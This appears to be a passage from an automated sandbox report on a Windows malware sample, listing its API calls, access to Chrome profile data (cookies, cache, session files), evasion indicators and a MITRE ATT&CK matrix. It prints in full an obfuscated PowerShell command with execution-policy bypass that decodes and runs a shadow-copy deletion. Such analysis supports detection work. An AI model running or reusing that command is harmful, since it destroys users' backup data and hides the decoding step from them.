                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: GetAdaptersInfo,RtlAllocateHeap,GetAdaptersInfo,inet_addr,RtlFreeHeap,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6102
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3111
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep count: 6102 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852Thread sleep count: 3111 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome
                        Source: powershell.exe, 00000006.00000003.279613000.00000165FE227000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE7E49 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE7E53 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE1F0F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Bypasses PowerShell execution policyShow sources
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeCode function: 0_2_00CE301C ImpersonateLoggedOnUser,GetUserNameW,GetComputerNameW,RtlAllocateHeap,_swprintf,RtlReAllocateHeap,RtlFreeHeap,RtlFreeHeap,RevertToSelf,
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information:

                        barindex
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\58ea1f927c503c2b_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5febb783fe057117_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\181db4280bb3db70_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\NULL
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\244f905c10de3c26_0
                        Source: C:\Users\user\Desktop\rUUR0qQI22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsCommand and Scripting Interpreter1Windows Service1Access Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping1Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationDefacement1
                        Default AccountsService Execution1Boot or Logon Initialization ScriptsWindows Service1Obfuscated Files or Information1LSASS MemorySystem Service Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsPowerShell1Logon Script (Windows)Process Injection11File Deletion1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery14Distributed Component Object ModelInput CaptureScheduled TransferProxy1SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion21LSA SecretsSecurity Software Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection11DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
